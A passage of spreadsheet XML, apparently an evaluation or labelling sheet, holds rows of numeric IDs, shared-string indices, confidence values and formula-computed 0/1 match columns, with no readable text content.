      </c>
      <c r="K526" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L526" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O526" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="62">
        <v>4919.0</v>
      </c>
      <c r="B527" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C527" s="63" t="s">
        <v>1769</v>
      </c>
      <c r="D527" s="62" t="s">
        <v>1770</v>
      </c>
      <c r="E527" s="62" t="s">
        <v>1771</v>
      </c>
      <c r="F527" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G527" s="62">
        <v>0.9</v>
      </c>
      <c r="H527" s="64">
        <v>0.0</v>
      </c>
      <c r="I527" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J527" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K527" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L527" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O527" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="62">
        <v>4943.0</v>
      </c>
      <c r="B528" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C528" s="63" t="s">
        <v>1772</v>
      </c>
      <c r="D528" s="62" t="s">
        <v>1773</v>
      </c>
      <c r="E528" s="62" t="s">
        <v>1774</v>
      </c>
      <c r="F528" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G528" s="62">
        <v>0.9</v>
      </c>
      <c r="H528" s="64">
        <v>1.0</v>
      </c>
      <c r="I528" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J528" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K528" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L528" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M528" s="62" t="s">
        <v>1775</v>
      </c>
      <c r="N528" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O528" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="62">
        <v>5198.0</v>
      </c>
      <c r="B529" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C529" s="63" t="s">
        <v>1776</v>
      </c>
      <c r="D529" s="62" t="s">
        <v>1777</v>
      </c>
      <c r="E529" s="62" t="s">
        <v>1778</v>
      </c>
      <c r="F529" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G529" s="62">
        <v>0.85</v>
      </c>
      <c r="H529" s="64">
        <v>0.0</v>
      </c>
      <c r="I529" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J529" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K529" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L529" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O529" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="62">
        <v>5359.0</v>
      </c>
      <c r="B530" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C530" s="63" t="s">
        <v>1779</v>
      </c>
      <c r="D530" s="62" t="s">
        <v>1780</v>
      </c>
      <c r="E530" s="62" t="s">
        <v>1781</v>
      </c>
      <c r="F530" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G530" s="62">
        <v>0.85</v>
      </c>
      <c r="H530" s="64">
        <v>0.0</v>
      </c>
      <c r="I530" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J530" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K530" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L530" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O530" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="62">
        <v>5368.0</v>
      </c>
      <c r="B531" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C531" s="63" t="s">
        <v>1782</v>
      </c>
      <c r="D531" s="62" t="s">
        <v>1783</v>
      </c>
      <c r="E531" s="62" t="s">
        <v>1784</v>
      </c>
      <c r="F531" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G531" s="62">
        <v>0.8</v>
      </c>
      <c r="H531" s="64">
        <v>0.0</v>
      </c>
      <c r="I531" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J531" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K531" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L531" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O531" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="62">
        <v>5384.0</v>
      </c>
      <c r="B532" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C532" s="63" t="s">
        <v>1785</v>
      </c>
      <c r="D532" s="62" t="s">
        <v>1786</v>
      </c>
      <c r="E532" s="62" t="s">
        <v>1787</v>
      </c>
      <c r="F532" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G532" s="62">
        <v>0.9</v>
      </c>
      <c r="H532" s="64">
        <v>0.0</v>
      </c>
      <c r="I532" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J532" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K532" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L532" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O532" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="62">
        <v>5400.0</v>
      </c>
      <c r="B533" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C533" s="63" t="s">
        <v>1788</v>
      </c>
      <c r="D533" s="62" t="s">
        <v>1789</v>
      </c>
      <c r="E533" s="62" t="s">
        <v>1790</v>
      </c>
      <c r="F533" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G533" s="62">
        <v>0.8</v>
      </c>
      <c r="H533" s="64">
        <v>0.0</v>
      </c>
      <c r="I533" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J533" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K533" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L533" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O533" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="62">
        <v>5469.0</v>
      </c>
      <c r="B534" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C534" s="63" t="s">
        <v>1791</v>
      </c>
      <c r="D534" s="62" t="s">
        <v>1792</v>
      </c>
      <c r="E534" s="62" t="s">
        <v>1793</v>
      </c>
      <c r="F534" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G534" s="62">
        <v>0.85</v>
      </c>
      <c r="H534" s="64">
        <v>1.0</v>
      </c>
      <c r="I534" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J534" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K534" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L534" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O534" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="62">
        <v>5553.0</v>
      </c>
      <c r="B535" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C535" s="63" t="s">
        <v>1794</v>
      </c>
      <c r="D535" s="62" t="s">
        <v>1795</v>
      </c>
      <c r="E535" s="62" t="s">
        <v>1796</v>
      </c>
      <c r="F535" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G535" s="62">
        <v>0.85</v>
      </c>
      <c r="H535" s="64">
        <v>0.0</v>
      </c>
      <c r="I535" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J535" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K535" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L535" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O535" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="62">
        <v>5746.0</v>
      </c>
      <c r="B536" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C536" s="63" t="s">
        <v>1797</v>
      </c>
      <c r="D536" s="62" t="s">
        <v>1798</v>
      </c>
      <c r="E536" s="62" t="s">
        <v>1799</v>
      </c>
      <c r="F536" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G536" s="62">
        <v>0.85</v>
      </c>
      <c r="H536" s="64">
        <v>0.0</v>
      </c>
      <c r="I536" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J536" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K536" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L536" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O536" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="62">
        <v>5907.0</v>
      </c>
      <c r="B537" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C537" s="63" t="s">
        <v>1800</v>
      </c>
      <c r="D537" s="62" t="s">
        <v>1801</v>
      </c>
      <c r="E537" s="62" t="s">
        <v>1802</v>
      </c>
      <c r="F537" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G537" s="62">
        <v>0.85</v>
      </c>
      <c r="H537" s="64">
        <v>0.0</v>
      </c>
      <c r="I537" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J537" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K537" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L537" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O537" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="62">
        <v>5990.0</v>
      </c>
      <c r="B538" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C538" s="63" t="s">
        <v>1803</v>
      </c>
      <c r="D538" s="62" t="s">
        <v>1804</v>
      </c>
      <c r="E538" s="62" t="s">
        <v>1805</v>
      </c>
      <c r="F538" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G538" s="62">
        <v>0.85</v>
      </c>
      <c r="H538" s="64">
        <v>1.0</v>
      </c>
      <c r="I538" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J538" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K538" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L538" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O538" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="62">
        <v>6007.0</v>
      </c>
      <c r="B539" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C539" s="63" t="s">
        <v>1806</v>
      </c>
      <c r="D539" s="62" t="s">
        <v>1807</v>
      </c>
      <c r="E539" s="62" t="s">
        <v>1808</v>
      </c>
      <c r="F539" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G539" s="62">
        <v>0.85</v>
      </c>
      <c r="H539" s="64">
        <v>1.0</v>
      </c>
      <c r="I539" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J539" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K539" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L539" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O539" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="62">
        <v>6033.0</v>
      </c>
      <c r="B540" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C540" s="63" t="s">
        <v>1809</v>
      </c>
      <c r="D540" s="62" t="s">
        <v>1810</v>
      </c>
      <c r="E540" s="62" t="s">
        <v>1811</v>
      </c>
      <c r="F540" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G540" s="62">
        <v>0.95</v>
      </c>
      <c r="H540" s="64">
        <v>0.0</v>
      </c>
      <c r="I540" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J540" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K540" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L540" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O540" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="62">
        <v>6403.0</v>
      </c>
      <c r="B541" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C541" s="63" t="s">
        <v>1812</v>
      </c>
      <c r="D541" s="62" t="s">
        <v>1813</v>
      </c>
      <c r="E541" s="62" t="s">
        <v>1814</v>
      </c>
      <c r="F541" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G541" s="62">
        <v>0.85</v>
      </c>
      <c r="H541" s="64">
        <v>1.0</v>
      </c>
      <c r="I541" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J541" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K541" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L541" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O541" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="62">
        <v>6444.0</v>
      </c>
      <c r="B542" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C542" s="63" t="s">
        <v>1815</v>
      </c>
      <c r="D542" s="62" t="s">
        <v>1816</v>
      </c>
      <c r="E542" s="62" t="s">
        <v>1817</v>
      </c>
      <c r="F542" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G542" s="62">
        <v>0.85</v>
      </c>
      <c r="H542" s="64">
        <v>0.0</v>
      </c>
      <c r="I542" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J542" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K542" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L542" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O542" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="62">
        <v>6458.0</v>
      </c>
      <c r="B543" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C543" s="63" t="s">
        <v>1818</v>
      </c>
      <c r="D543" s="62" t="s">
        <v>1819</v>
      </c>
      <c r="E543" s="62" t="s">
        <v>1820</v>
      </c>
      <c r="F543" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G543" s="62">
        <v>0.85</v>
      </c>
      <c r="H543" s="64">
        <v>0.0</v>
      </c>
      <c r="I543" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J543" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K543" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L543" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O543" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="62">
        <v>6484.0</v>
      </c>
      <c r="B544" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C544" s="63" t="s">
        <v>1821</v>
      </c>
      <c r="D544" s="62" t="s">
        <v>1822</v>
      </c>
      <c r="E544" s="62" t="s">
        <v>1823</v>
      </c>
      <c r="F544" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G544" s="62">
        <v>0.9</v>
      </c>
      <c r="H544" s="64">
        <v>1.0</v>
      </c>
      <c r="I544" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J544" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K544" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L544" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O544" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="62">
        <v>6610.0</v>
      </c>
      <c r="B545" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C545" s="63" t="s">
        <v>1824</v>
      </c>
      <c r="D545" s="62" t="s">
        <v>1825</v>
      </c>
      <c r="E545" s="62" t="s">
        <v>1826</v>
      </c>
      <c r="F545" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G545" s="62">
        <v>0.85</v>
      </c>
      <c r="H545" s="64">
        <v>1.0</v>
      </c>
      <c r="I545" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J545" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K545" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L545" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O545" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="62">
        <v>6686.0</v>
      </c>
      <c r="B546" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C546" s="63" t="s">
        <v>1827</v>
      </c>
      <c r="D546" s="62" t="s">
        <v>1828</v>
      </c>
      <c r="E546" s="62" t="s">
        <v>1829</v>
      </c>
      <c r="F546" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G546" s="62">
        <v>0.85</v>
      </c>
      <c r="H546" s="64">
        <v>0.0</v>
      </c>
      <c r="I546" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J546" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K546" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L546" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O546" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="62">
        <v>6723.0</v>
      </c>
      <c r="B547" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C547" s="63" t="s">
        <v>1830</v>
      </c>
      <c r="D547" s="62" t="s">
        <v>1831</v>
      </c>
      <c r="E547" s="62" t="s">
        <v>1832</v>
      </c>
      <c r="F547" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G547" s="62">
        <v>0.9</v>
      </c>
      <c r="H547" s="64">
        <v>1.0</v>
      </c>
      <c r="I547" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J547" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K547" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L547" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O547" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="62">
        <v>6859.0</v>
      </c>
      <c r="B548" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C548" s="63" t="s">
        <v>1833</v>
      </c>
      <c r="D548" s="62" t="s">
        <v>1834</v>
      </c>
      <c r="E548" s="62" t="s">
        <v>1835</v>
      </c>
      <c r="F548" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G548" s="62">
        <v>0.9</v>
      </c>
      <c r="H548" s="64">
        <v>1.0</v>
      </c>
      <c r="I548" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J548" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K548" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L548" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O548" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="62">
        <v>7101.0</v>
      </c>
      <c r="B549" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C549" s="63" t="s">
        <v>1836</v>
      </c>
      <c r="D549" s="62" t="s">
        <v>1837</v>
      </c>
      <c r="E549" s="62" t="s">
        <v>1838</v>
      </c>
      <c r="F549" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G549" s="62">
        <v>0.85</v>
      </c>
      <c r="H549" s="64">
        <v>1.0</v>
      </c>
      <c r="I549" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J549" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K549" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L549" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O549" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="62">
        <v>7106.0</v>
      </c>
      <c r="B550" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C550" s="63" t="s">
        <v>1839</v>
      </c>
      <c r="D550" s="62" t="s">
        <v>1840</v>
      </c>
      <c r="E550" s="62" t="s">
        <v>1841</v>
      </c>
      <c r="F550" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G550" s="62">
        <v>0.85</v>
      </c>
      <c r="H550" s="64">
        <v>1.0</v>
      </c>
      <c r="I550" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J550" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K550" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L550" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O550" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="62">
        <v>7212.0</v>
      </c>
      <c r="B551" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C551" s="63" t="s">
        <v>1842</v>
      </c>
      <c r="D551" s="62" t="s">
        <v>1843</v>
      </c>
      <c r="E551" s="62" t="s">
        <v>1844</v>
      </c>
      <c r="F551" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G551" s="62">
        <v>0.85</v>
      </c>
      <c r="H551" s="64">
        <v>1.0</v>
      </c>
      <c r="I551" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J551" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K551" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L551" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O551" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="62">
        <v>7308.0</v>
      </c>
      <c r="B552" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C552" s="63" t="s">
        <v>1845</v>
      </c>
      <c r="D552" s="62" t="s">
        <v>1846</v>
      </c>
      <c r="E552" s="62" t="s">
        <v>1847</v>
      </c>
      <c r="F552" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G552" s="62">
        <v>0.85</v>
      </c>
      <c r="H552" s="64">
        <v>1.0</v>
      </c>
      <c r="I552" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J552" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K552" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L552" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O552" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="62">
        <v>7314.0</v>
      </c>
      <c r="B553" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C553" s="63" t="s">
        <v>1848</v>
      </c>
      <c r="D553" s="62" t="s">
        <v>1849</v>
      </c>
      <c r="E553" s="62" t="s">
        <v>1850</v>
      </c>
      <c r="F553" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G553" s="62">
        <v>0.85</v>
      </c>
      <c r="H553" s="64">
        <v>1.0</v>
      </c>
      <c r="I553" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J553" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K553" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L553" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O553" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="62">
        <v>7490.0</v>
      </c>
      <c r="B554" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C554" s="63" t="s">
        <v>1851</v>
      </c>
      <c r="D554" s="62" t="s">
        <v>1852</v>
      </c>
      <c r="E554" s="62" t="s">
        <v>1853</v>
      </c>
      <c r="F554" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G554" s="62">
        <v>0.9</v>
      </c>
      <c r="H554" s="64">
        <v>1.0</v>
      </c>
      <c r="I554" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J554" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K554" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L554" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O554" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="62">
        <v>5533.0</v>
      </c>
      <c r="B555" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C555" s="63" t="s">
        <v>1854</v>
      </c>
      <c r="D555" s="62" t="s">
        <v>1855</v>
      </c>
      <c r="E555" s="62" t="s">
        <v>1856</v>
      </c>
      <c r="F555" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G555" s="62">
        <v>0.9</v>
      </c>
      <c r="H555" s="64">
        <v>1.0</v>
      </c>
      <c r="I555" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J555" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K555" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L555" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O555" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="62">
        <v>5694.0</v>
      </c>
      <c r="B556" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C556" s="63" t="s">
        <v>1857</v>
      </c>
      <c r="D556" s="62" t="s">
        <v>1858</v>
      </c>
      <c r="E556" s="62" t="s">
        <v>1859</v>
      </c>
      <c r="F556" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G556" s="62">
        <v>0.8</v>
      </c>
      <c r="H556" s="64">
        <v>1.0</v>
      </c>
      <c r="I556" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J556" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K556" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L556" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O556" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="62">
        <v>6364.0</v>
      </c>
      <c r="B557" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C557" s="63" t="s">
        <v>1860</v>
      </c>
      <c r="D557" s="62" t="s">
        <v>1861</v>
      </c>
      <c r="E557" s="62" t="s">
        <v>1862</v>
      </c>
      <c r="F557" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G557" s="62">
        <v>0.85</v>
      </c>
      <c r="H557" s="64">
        <v>0.0</v>
      </c>
      <c r="I557" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J557" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K557" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L557" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O557" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="62">
        <v>6520.0</v>
      </c>
      <c r="B558" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C558" s="63" t="s">
        <v>1863</v>
      </c>
      <c r="D558" s="62" t="s">
        <v>1864</v>
      </c>
      <c r="E558" s="62" t="s">
        <v>1865</v>
      </c>
      <c r="F558" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G558" s="62">
        <v>0.85</v>
      </c>
      <c r="H558" s="64">
        <v>1.0</v>
      </c>
      <c r="I558" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J558" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K558" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L558" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O558" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="62">
        <v>8986.0</v>
      </c>
      <c r="B559" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C559" s="63" t="s">
        <v>1866</v>
      </c>
      <c r="D559" s="62" t="s">
        <v>1867</v>
      </c>
      <c r="E559" s="62" t="s">
        <v>1868</v>
      </c>
      <c r="F559" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G559" s="62">
        <v>0.8</v>
      </c>
      <c r="H559" s="64">
        <v>1.0</v>
      </c>
      <c r="I559" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J559" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K559" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L559" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O559" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="62">
        <v>9362.0</v>
      </c>
      <c r="B560" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C560" s="63" t="s">
        <v>1869</v>
      </c>
      <c r="D560" s="62" t="s">
        <v>1870</v>
